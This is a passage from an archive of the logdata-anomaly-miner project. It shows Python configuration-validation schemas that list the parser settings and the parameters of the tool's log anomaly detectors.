'string'}, 'url': {'type': 'string', 'default': 'ipc:///tmp/aminer'}, 'cfgfile': {'type': 'string', 'default': '/etc/aminer/kafka-client.conf'}, 'options': {'type': 'dict', 'schema': {'id': {'type': 'string'}, 'type': {'type': ['string', 'list', 'integer']}}}, 'output_file_path': {'type': 'string'}, 'pretty': {'type': 'boolean', 'default': True}, 'weights': 
{'type': 'dict', 'nullable': True, 'default': None}, 'auto_weights': {'type': 'boolean', 'default': False}, 'auto_weights_history_length': {'type': 'integer', 'default': 1000, 'min': 1} } } } } ParserNormalisationSchema.py000066400000000000000000000052501500476301700411170ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation{ 'Parser': { 'required': True, 'type': 'list', 'has_start': True, 'schema': { 'type': 'dict', 'schema': { 'id': {'type': 'string', 'required': True}, 'start': {'type': 'boolean'}, 'type': {'type': 'parsermodel', 'coerce': 'toparsermodel', 'required': True}, 'name': {'type': 'string', 'required': True}, 'args': {'type': ['string', 'list'], 'schema': {'type': ['string', 'integer']}, 'nullable': True}, 'branch_model_dict': {'type': 'list', 'schema': {'type': 'dict', 'schema': {'id': { 'type': ['boolean', 'float', 'integer', 'string']}, 'model': {'type': 'string'}}}}, 'date_formats': {'type': 'list', 'schema': {'type': 'dict', 'schema': {'format': {'type': 'list', 'schema': { 'type': 'string', 'nullable': True}}}}}, 'value_sign_type': {'type': 'string', 'allowed': ['none', 'optional', 'mandatory'], 'default': 'none'}, 'value_pad_type': {'type': 'string', 'allowed': ['none', 'zero', 'blank'], 'default': 'none'}, 'exponent_type': {'type': 'string', 'allowed': ['none', 'optional', 'mandatory'], 'default': 'none'}, 'start_year': {'type': 'integer', 'nullable': True, 'default': None}, 'delimiter': {'type': 'string'}, 'escape': {'type': 'string', 'nullable': True, 'default': None}, 'consume_delimiter': {'type': 'boolean', 'default': False}, 'key_parser_dict': {'type': 'dict'}, 'optional_key_prefix': {'type': 'string', 'default': 'optional_key_'}, 'nullable_key_prefix': {'type': 'string', 'default': '+'}, 'strict': {'type': 'boolean', 'default': False}, 'ignore_null': {'type': 'boolean', 'default': True}, 'date_format': {'type': 'string', 'minlength': 2}, 'text_locale': {'type': 
'string', 'nullable': True, 'default': None}, 'max_time_jump_seconds': {'type': 'integer', 'default': 86400}, 'timestamp_scale': {'type': 'integer', 'default': 1}, 'allow_all_fields': {'type': 'boolean', 'default': False}, 'xml_header_expected': {'type': 'boolean', 'default': False}, 'attribute_prefix': {'type': 'string', 'default': '+'}, 'optional_attribute_prefix': {'type': 'string', 'default': '_'}, 'empty_allowed_prefix': {'type': 'string', 'default': '?'}, 'time_zone': {'type': 'string', 'nullable': True, 'default': 'UTC'}, } } }, } logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/validation/000077500000000000000000000000001500476301700327605ustar00rootroot00000000000000AnalysisValidationSchema.py000066400000000000000000001674261500476301700402120ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/validation{ 'Analysis': { 'required': False, 'type': 'list', 'nullable': True, 'schema': { 'type': 'dict', 'allow_unknown': False, 'oneof_schema': [ { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['AllowlistViolationDetector'], 'required': True}, 'allowlist_rules': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['MatchPathFilter'], 'required': True}, 'parsed_atom_handler_lookup_list': { 'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string', 'nullable': True}}, 'required': True}, 'default_parsed_atom_handler': {'type': 'string', 'nullable': True}, 'output_event_handlers': {'type': 
'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['MatchValueFilter'], 'required': True}, 'path': {'type': 'string', 'required': True, 'empty': False}, 'parsed_atom_handler_dict': { 'type': 'dict', 'schema': {'id': {'type': 'string'}, 'type': {'type': 'string'}}, 'required': True}, 'default_parsed_atom_handler': {'type': 'string', 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True}, 'type': {'type': 'string', 'allowed': ['PCADetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string'}, 'nullable': True}, 'window_size': {'type': ['integer', 'float'], 'min': 0.001}, 'min_anomaly_score': {'type': 'float'}, 'min_variance': {'type': 'float'}, 'num_windows': {'type': 'float'}, 'persistence_id': {'type': 'string'}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['EnhancedNewMatchPathValueComboDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True, 
'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'allow_missing_values': {'type': 'boolean'}, 'learn_mode': {'type': 'boolean'}, 'tuple_transformation_function': {'type': 'string', 'allowed': ['demo'], 'nullable': True}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['EventCorrelationDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'max_hypotheses': {'type': 'integer', 'min': 1}, 'hypothesis_max_delta_time': {'type': 'float', 'min': 0.01}, 'generation_probability': {'type': 'float', 'min': 0, 'max': 1}, 'generation_factor': {'type': 'float', 'min': 0, 'max': 1}, 'max_observations': {'type': 'integer', 'min': 1}, 'p0': {'type': 'float', 'min': 0, 'max': 1}, 'alpha': {'type': 'float', 'min': 0, 'max': 1}, 'candidates_size': {'type': 'integer', 'min': 1}, 'hypotheses_eval_delta_time': {'type': 'float', 'min': 0.01}, 'delta_time_to_discard_hypothesis': { 'type': 'float', 'min': 0.01, 'bigger_than_or_equal': ['hypotheses_eval_delta_time', 120.0]}, 'check_rules_flag': {'type': 'boolean'}, 'learn_mode': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'output_logline': {'type': 'boolean'}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 
'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['EventFrequencyDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'scoring_path_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'unique_path_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'window_size': {'type': ['integer', 'float'], 'min': 0.001}, 'num_windows': {'type': 'integer'}, 'empty_window_warnings': {'type': 'boolean'}, 'early_exceeding_anomaly_output': {'type': 'boolean'}, 'season': {'type': 'float', 'min': 0, 'nullable': True}, 'set_lower_limit': {'type': ['integer', 'float'], 'min': 0, 'nullable': True}, 'set_upper_limit': {'type': ['integer', 'float'], 'min': 0, 'nullable': True}, 'confidence_factor': {'type': 'float', 'min': 0, 'max': 1}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': 
{'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['EventCountClusterDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'id_path_list': {'type': 'list', 'nullable': True}, 'window_size': {'type': ['integer', 'float'], 'min': 0.001}, 'num_windows': {'type': 'integer'}, 'confidence_factor': {'type': 'float', 'min': 0, 'max': 1}, 'idf': {'type': 'boolean'}, 'norm': {'type': 'boolean'}, 'add_normal': {'type': 'boolean'}, 'check_empty_windows': {'type': 'boolean'}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['EventSequenceDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'id_path_list': {'type': 'list', 'nullable': True}, 'seq_len': {'type': 'integer', 'min': 1}, 'timeout': {'type': 'integer', 'min': 0.1, 'nullable': True}, 'allow_missing_id': {'type': 'boolean'}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 
'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ValueRangeDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'id_path_list': {'type': 'list', 'nullable': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['CharsetDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}}, 'id_path_list': {'type': 'list', 'nullable': True}, 'persistence_id': {'type': 'string', 
'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['EntropyDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}}, 'prob_thresh': {'type': 'float'}, 'default_freqs': {'type': 'boolean'}, 'skip_repetitions': {'type': 'boolean'}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['EventTypeDetector'], 'required': True}, 'paths': {'type': 'list', 
'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'id_path_list': {'type': 'list', 'nullable': True}, 'allow_missing_id': {'type': 'boolean'}, 'allowed_id_tuples': {'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string'}}, 'nullable': True}, 'min_num_vals': {'type': 'integer', 'min': 1}, 'max_num_vals': {'type': 'integer', 'min': 1, 'bigger_than_or_equal': ['min_num_vals', 1000]}, 'save_values': {'type': 'boolean'}, 'learn_mode': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['SlidingEventFrequencyDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'scoring_path_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'window_size': {'type': ['integer', 'float'], 'min': 0.001}, 'set_upper_limit': {'type': ['integer', 'float'], 'min': 0}, 'local_maximum_threshold': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 
'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['LinearNumericBinDefinition'], 'required': True}, 'lower_limit': {'type': ['integer', 'float'], 'required': True}, 'bin_size': {'type': 'integer', 'required': True, 'min': 1}, 'bin_count': {'type': 'integer', 'required': True, 'min': 1}, 'outlier_bins_flag': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ModuloTimeBinDefinition'], 'required': True}, 'modulo_value': {'type': ['integer', 'float'], 'required': True, 'min': 0.000001}, 'time_unit': {'type': 'integer', 'required': True, 'min': 1}, 'lower_limit': {'type': ['integer', 'float'], 'required': True, 'min': 0}, 'bin_size': {'type': 'integer', 'required': True, 'min': 1}, 'bin_count': {'type': 'integer', 'required': True, 'min': 1}, 'outlier_bins_flag': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['HistogramAnalysis'], 'required': True}, 'histogram_defs': { 'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string', 'empty': False}}, 'required': True}, 'report_interval': {'type': 'integer', 'required': True, 'min': 1}, 'reset_after_report_flag': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': 
{'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['PathDependentHistogramAnalysis'], 'required': True}, 'path': {'type': 'string', 'required': True, 'empty': False}, 'bin_definition': {'type': 'string', 'required': True, 'empty': False}, 'report_interval': {'type': 'integer', 'required': True, 'min': 1}, 'reset_after_report_flag': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['MatchFilter'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'value_list': { 'type': 'list', 'schema': {'type': ['boolean', 'float', 'integer', 'string']}, 'nullable': True}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['MatchValueAverageChangeDetector'], 'required': True}, 'timestamp_path': {'type': 'string', 'required': True, 'nullable': True, 'empty': False}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'min_bin_elements': {'type': 'integer', 'required': True, 'min': 1}, 'min_bin_time': {'type': 'integer', 'required': True, 'min': 1}, 'debug_mode': {'type': 'boolean'}, 'persistence_id': {'type': 'string', 'empty': False}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': 
False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'avg_factor': {'type': ['integer', 'float'], 'nullable': True, 'min': 0}, 'var_factor': {'type': ['integer', 'float'], 'nullable': True, 'min': 0}, 'learn_mode': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['MatchValueStreamWriter'], 'required': True}, 'stream': {'type': 'string', 'allowed': ['sys.stdout', 'sys.stderr'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'separator': {'type': 'string', 'required': True}, 'missing_value_string': {'type': 'string', 'required': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['MissingMatchPathValueDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'combine_values': {'type': 'boolean'}, 'check_interval': {'type': 'integer', 'min': 1}, 'realert_interval': {'type': 'integer', 'min': 1, 'bigger_than_or_equal': ['check_interval', 3600]}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 
'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['MissingMatchPathListValueDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'combine_values': {'type': 'boolean'}, 'check_interval': {'type': 'integer', 'min': 1}, 'realert_interval': {'type': 'integer', 'min': 1, 'bigger_than_or_equal': ['check_interval', 3600]}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['NewMatchIdValueComboDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'id_path_list': {'type': 'list', 'required': True}, 'min_allowed_time_diff': {'type': 'float', 'required': True, 'min': 0.01}, 'persistence_id': {'type': 'string', 'empty': False}, 'allow_missing_values': {'type': 'boolean'}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 
'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['NewMatchPathDetector'], 'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['NewMatchPathValueComboDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'allow_missing_values': {'type': 'boolean'}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['NewMatchPathValueDetector'], 'required': True}, 'paths': {'type': 'list', 
'schema': {'type': 'string', 'empty': False}, 'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ParserCount'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}}, 'report_interval': {'type': 'integer', 'min': 1}, 'labels': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'split_reports_flag': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['EventGenerationMatchAction'], 'required': True}, 'event_type': {'type': 'string', 'required': True}, 'event_message': {'type': 'string', 'required': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['AtomFilterMatchAction'], 'required': True}, # this is optional on purpose. If not used, the default atom_filter is used. 
'subhandler_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}}, 'stop_when_handled_flag': {'type': 'boolean'}, 'delete_components': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['AndMatchRule', 'OrMatchRule', 'ParallelMatchRule'], 'required': True}, 'sub_rules': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'match_action': {'type': 'string', 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ValueDependentDelegatedMatchRule'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'rule_lookup_dict': {'type': 'dict', 'valuesrules': {'type': 'string'}, 'required': True}, 'default_rule': {'type': 'string', 'nullable': True, 'empty': False}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['NegationMatchRule'], 'required': True}, 'sub_rule': {'type': 'string', 'required': True, 'empty': False}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': 